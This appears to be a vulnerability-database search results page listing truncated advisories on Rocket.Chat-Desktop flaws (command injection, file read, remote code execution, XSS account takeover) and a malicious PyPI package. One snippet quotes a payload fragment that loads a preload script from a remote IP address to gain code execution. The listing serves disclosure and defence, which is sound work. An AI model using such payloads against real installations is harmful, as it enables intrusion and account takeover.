10 matches found
EUVD-2022-47508
Malicious code in bioql PyPI...
CVE-2022-44567
A command injection vulnerability exists in Rocket.Chat-Desktop 3.8.14 that could allow an attacker to pass a malicious url of openInternalVideoChatWindow to shell.openExternal, which may lead to remote code execution internalVideoChatWindow.tsL17. To exploit the vulnerability, the internal video...
CVE-2022-44567
Summary: CVE-2022-44567 affects Rocket.Chat-Desktop
Rocket.Chat: Arbitrary file read in Rocket.Chat-Desktop
Description: Rocket.Chat-Desktop is vulnerable to arbitrary file read. Releases Affected: Rocket.Chat-Desktop-Client: v3.0.0-develop Steps To Reproduce by setting up a malicious server: 1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users 1. Insert the following...
Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop
Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'.join','...
Rocket.Chat: Account takeover via XSS
Summary: By combining AutoLinker and Markdown an attacker is able to inject malicious scripts. Description: By combining AutoLinker and Markdown we can trick the parser into breaking out of the current HTML attribute. https://a?p= results in: html ." target="blank" rel="noopener noreferrer" "...
Rocket.Chat: XSS (leads to arbitrary file read in Rocket.Chat-Desktop)
Description: Rocket.Chat allows administrative users to customize the home body. Since tags are removed, I think that running scripts should not be allowed. However, event handlers are not removed, allowing you to inject your own scripts. Releases Affected: Rocket.Chat-Desktop-Client: v2.15.5...